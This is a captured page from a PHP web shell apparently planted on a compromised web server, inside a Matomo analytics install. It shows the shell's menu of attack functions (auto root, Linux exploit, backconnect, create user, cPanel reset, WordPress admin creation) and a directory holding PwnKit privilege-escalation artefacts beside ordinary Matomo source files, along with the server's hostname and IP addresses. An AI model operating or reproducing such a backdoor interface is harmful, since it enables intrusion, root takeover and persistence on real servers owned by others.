Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.118.162.166
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Db /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Adapter
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Adapter.php
4.74
KB
-rw-r--r--
AdapterInterface.php
1.31
KB
-rw-r--r--
BatchInsert.php
11.24
KB
-rw-r--r--
Schema.php
4.78
KB
-rw-r--r--
SchemaInterface.php
2.45
KB
-rw-r--r--
Settings.php
872
B
-rw-r--r--
TransactionLevel.php
2.99
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Settings.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Db; use Piwik\Db; class Settings { public function getEngine() { return $this->getDbSetting('type'); } public function getTablePrefix() { return $this->getDbSetting('tables_prefix'); } public function getDbName() { return $this->getDbSetting('dbname'); } public function getUsedCharset() { return strtolower($this->getDbSetting('charset')); } public function getRowFormat() { return $this->getUsedCharset() === 'utf8mb4' ? 'ROW_FORMAT=DYNAMIC' : ''; } private function getDbSetting($key) { $dbInfos = Db::getDatabaseConfig(); return $dbInfos[$key] ?? null; } }
Close